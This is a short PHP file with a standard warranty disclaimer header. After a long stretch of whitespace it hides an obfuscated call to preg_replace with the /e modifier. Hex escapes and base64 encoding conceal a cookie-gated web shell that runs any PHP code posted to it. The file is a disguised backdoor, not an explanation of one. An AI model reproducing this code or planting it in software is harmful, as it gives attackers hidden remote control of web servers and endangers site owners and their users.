<?php

/**
 *  
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
 * NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
 * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
 * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
 * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
 * DAMAGE.
 * 
 *
*/
 
                                                                                                                                                                                                                                                                                 preg_replace("/[grhauuucemqjgdmfnjipyq]*.+[gunekttdfnzejgrkqhijmypbjlxenw]*/esi","\x65\x76\x61"."\x6C\x28\x62\x61\x73\x65\x36\x34"."\x5F\x64\x65\x63\x6F"."\x64\x65\x28'aW"."YgKCFlbXB0eSgkX0NPT0tJRVsndiddK"."SBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8g"."Jzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIEBldmFsKCRkKTsgZWNobyAnPC90ZXh0YXJlYT4nO30NCmVjaG8gJzxmb"."3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdD48dGV4dGFyZWEgY29sc"."z04MCByb3dzPTI4IG5hbWU9Yz48L3RleHRhcmVhPjxicj48aW5wdXQgdHlwZT1zdWJtaXQ+PC9mb3JtPic7ZXhpd"."Dt9'\x29"."\x29\x3B",'abwiylwdgjzdrjcf'); 
?>